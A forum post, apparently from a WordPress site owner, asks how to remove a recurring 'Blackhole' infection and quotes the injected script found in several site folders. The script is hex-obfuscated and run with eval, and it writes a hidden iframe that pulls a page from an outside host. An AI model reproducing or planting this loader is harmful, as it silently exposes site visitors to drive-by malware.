possible hack attempt with backdoor black hole

  • hi guys

    i think my site has had an attack from blackhole backdoor trojen.

    copy from link below is replicated 6 times

    I found the script in

    this has been deleted but then replicates

    index.php
    root folder
    wp-admin
    wp–content

    which looks like
    <script>var t=””;var arr=”646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f616e647265776368656e2e75732f666f72756d2e7068703f74703d39623134396232333465353933643736222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729″;for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>

    below is a scrpit from google development tools

    https://pastebin.com/NDrEAwu2

    also there is a cookie that keeps replicating

    <div class=”base-storage-tree-element-title”>andrewchen.us</div>

    how do i get rid of this please

  • The topic ‘possible hack attempt with backdoor black hole’ is closed to new replies.